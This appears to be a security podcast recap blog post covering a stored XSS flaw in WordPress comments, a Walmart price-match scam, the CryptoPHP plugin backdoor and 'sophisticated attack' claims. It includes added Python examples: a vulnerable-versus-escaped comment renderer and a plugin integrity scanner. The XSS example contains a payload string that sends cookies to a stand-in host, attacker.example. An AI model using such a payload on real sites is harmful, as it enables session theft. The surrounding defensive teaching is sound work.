
#HackerKast 11: WordPress XSS Vuln, $90 PlayStation 4s and CryptoPHP Backdoor

Happy Late Thanksgiving everybody! We started out this week going around the table talking about how thankful we are for browser insecurity, web application security, and the Texas cold front.

First story we talked about was a new, extremely widespread XSS vulnerability tied to the WordPress Statistics “plugin” (I put plugin in quotes because, as of September, roughly 90% of WordPress sites had this WP-Statistics plugin installed, and that is down to about 86% at the time of this post). The commenting system here is blatantly vulnerable to XSS, which leaves me confused about how it took this long to come to light.

The proof of concept the researchers published alongside their write-up is very nasty, because this is a persistent (stored) XSS vulnerability. An attacker leaves a comment on a blog post; when the WordPress admin opens the moderation queue to approve it, the payload runs in the admin’s browser, steals that admin’s session cookies and sends them to the attacker. Other possibilities include changing the current admin’s password, adding a new admin account, or using the plugin editor to write your own malicious PHP and execute it instantly. One caveat a practitioner should keep in mind: WordPress sets its authentication cookies HttpOnly, so the cookie-theft variant is the least reliable of these. The script does not need to read the cookie, though; every same-origin request it makes from the admin’s browser carries it automatically, which is exactly what makes the password-change and plugin-editor variants work.
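To make the mechanics concrete, here is an added example (my own, not code from the post, the researchers’ PoC, or WordPress): a toy moderation queue rendered two ways, once by interpolating the stored comment straight into the page and once with HTML escaping. The comment text, author names and the attacker.example host are constructed for the example.

```python
"""Added example (not code from the HackerKast post or from WordPress):
a toy comment moderation page rendered two ways, to show how a stored
comment becomes script that runs in the moderator's browser, and what
output escaping does to it."""
import html
import re

# Constructed sample input: what an attacker submits through the comment form.
# The payload tries to send the viewer's cookies to a host the attacker
# controls (attacker.example is a placeholder, not a real server).
ATTACKER_COMMENT = (
    "Great post!"
    '<script>new Image().src="https://attacker.example/c?"'
    "+encodeURIComponent(document.cookie)</script>"
)

# Constructed moderation queue: one benign comment, one hostile one.
PENDING_COMMENTS = [
    {"author": "alice", "body": "Thanks for writing this up."},
    {"author": "mallory", "body": ATTACKER_COMMENT},
]


def render_queue_vulnerable(comments):
    """Interpolates stored comment text straight into the admin page."""
    rows = [f'<li><b>{c["author"]}</b>: {c["body"]}</li>' for c in comments]
    return '<ul class="moderation-queue">' + "".join(rows) + "</ul>"


def render_queue_safe(comments):
    """Same page, but every untrusted field is HTML-escaped first."""
    rows = [
        f'<li><b>{html.escape(c["author"])}</b>: {html.escape(c["body"])}</li>'
        for c in comments
    ]
    return '<ul class="moderation-queue">' + "".join(rows) + "</ul>"


# Cheap tell for executable content: script tags, inline event handlers,
# javascript: URLs. Good enough to compare the two renderers; not a
# substitute for an HTML parser in production.
ACTIVE_CONTENT = re.compile(r"<script\b|\son[a-z]+\s*=|javascript:", re.IGNORECASE)


def contains_active_content(fragment):
    """True if the rendered HTML carries something a browser would execute."""
    return bool(ACTIVE_CONTENT.search(fragment))


if __name__ == "__main__":
    for name, render in (("vulnerable", render_queue_vulnerable),
                         ("escaped", render_queue_safe)):
        page = render(PENDING_COMMENTS)
        print(f"{name:10s} active content: {contains_active_content(page)}")
```

Escaping everything is the blunt fix; WordPress actually allows a small set of tags in comments through an allowlist filter (wp_kses), and keeping an allowlist airtight is the harder problem, which is why bugs like this one keep showing up in comment handling.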

Next, we spoke about a clever, less technical business-logic hack against Walmart. People were taking advantage of Walmart’s price-matching policy by standing up fake online storefronts advertising lower prices. These pages looked legitimate enough but were in no way actual retailers. The most widespread use of this, and the one that caught the attention of the right folks, was people getting PlayStation 4s for $90. Robert was very upset that he only heard about this after Walmart tightened its controls.

Robert then gave us an overview of a new backdoor that is taking advantage of common blog plugins. The attackers create legitimate-looking add-ons by making near-exact mirrors of WordPress, Joomla, Drupal, etc. plugins and themes. The attack itself is a combination of phishing and malware: they trick the admins of these blogs into installing the near-mirror copies of the plugins, which carry an added backdoor called CryptoPHP. The defense comes down to the hard, age-old problem of deciding where, and from whom, to trust a download of any code you are going to install and execute.
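As an added example of that “where and whom to trust” check (mine, not code from the post or from any plugin project), here is a small Python scanner that does two things to a plugin or theme package before it goes anywhere near a site: it compares the package against a hash manifest recorded from the official download, and it flags the tell that public analyses of CryptoPHP described, a PHP include of a file with an image extension that actually contains PHP. Package contents, paths and the manifest are constructed for the example.

```python
"""Added example, not code from the HackerKast post or from any plugin
project: two checks to run on a plugin/theme package obtained from anywhere
other than the official source. Manifest, file contents and paths are
constructed for the example."""
import hashlib
import re

# Constructed stand-in for the official package: {relative path: bytes}.
OFFICIAL_FILES = {
    "nice-widget/nice-widget.php": (
        b"<?php\n/* Plugin Name: Nice Widget */\n"
        b"require_once plugin_dir_path(__FILE__) . 'inc/helpers.php';\n"
    ),
    "nice-widget/inc/helpers.php": b"<?php\nfunction nw_helper() { return 1; }\n",
    "nice-widget/readme.txt": b"=== Nice Widget ===\n",
}
# Hash manifest as you would record it from the official download.
OFFICIAL_MANIFEST = {p: hashlib.sha256(c).hexdigest() for p, c in OFFICIAL_FILES.items()}

# Constructed stand-in for the "near-mirror" copy from a third-party site:
# one extra include in the main file, pointing at an "image" that is PHP.
MIRRORED_FILES = dict(OFFICIAL_FILES)
MIRRORED_FILES["nice-widget/nice-widget.php"] = (
    OFFICIAL_FILES["nice-widget/nice-widget.php"]
    + b"include_once(dirname(__FILE__) . '/images/logo.png');\n"
)
MIRRORED_FILES["nice-widget/images/logo.png"] = b"<?php /* backdoor body would go here */ ?>"

# include/require followed (within the same statement) by a quoted target.
INCLUDE_RE = re.compile(
    r"\b(include_once|require_once|include|require)\b[^;]*?['\"]([^'\"]+)['\"]",
    re.IGNORECASE,
)
PHP_OPEN_TAG = re.compile(rb"<\?php|<\?=")


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def manifest_diff(files, manifest):
    """Compare a package against the official manifest.
    Returns (modified, added, missing) as sorted path lists."""
    modified = sorted(p for p, c in files.items()
                      if p in manifest and sha256_hex(c) != manifest[p])
    added = sorted(p for p in files if p not in manifest)
    missing = sorted(p for p in manifest if p not in files)
    return modified, added, missing


def suspicious_includes(files):
    """include/require statements in PHP files whose target is not .php/.inc."""
    hits = []
    for path, content in sorted(files.items()):
        if not path.endswith(".php"):
            continue
        for m in INCLUDE_RE.finditer(content.decode("utf-8", "replace")):
            target = m.group(2)
            if not target.lower().endswith((".php", ".inc")):
                hits.append((path, target))
    return hits


def php_in_non_php_files(files):
    """Files without a .php extension that nevertheless carry a PHP open tag."""
    return sorted(p for p, c in files.items()
                  if not p.endswith(".php") and PHP_OPEN_TAG.search(c))


if __name__ == "__main__":
    modified, added, missing = manifest_diff(MIRRORED_FILES, OFFICIAL_MANIFEST)
    print("modified:", modified, "added:", added, "missing:", missing)
    print("suspicious includes:", suspicious_includes(MIRRORED_FILES))
    print("php hidden in non-php files:", php_in_non_php_files(MIRRORED_FILES))
```

The manifest comparison is the check that actually answers the trust question: any file that differs from the official copy is a reason to stop, whether or not the heuristics fire. The include and open-tag scans are cheap triage for the case where you have no trusted manifest at all.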

Lastly, Jeremiah didn’t shy away from some shameless self-promotion of a blog post we put out about the characteristics that make an attack “sophisticated.” This is an interesting, blood-boiling topic for a few of us who have been around for a while. We see press releases come out all the time claiming a recent breach was caused by a “sophisticated attack,” only to find out later that it was plain vanilla SQL injection. Jeremiah decided to step up and try to define what is needed to actually claim a sophisticated attack. This is by no means a complete list, but it is certainly a start, and we welcome any and all feedback.

This week’s bonus footage comes from Robert who walked us through some cool research around clickjacking. Check it out!

Resources:

CryptoPHP Backdoor Hijacks Servers with Malicious Plugins and Themes

Scam Tricks Walmart into Selling $90 PS4s

Death by Comments: WordPress XSS Vuln is Biggest in Years

5 Characteristics of a ‘Sophisticated Attack’

Tags: web application security, web application vulnerabilities, WordPress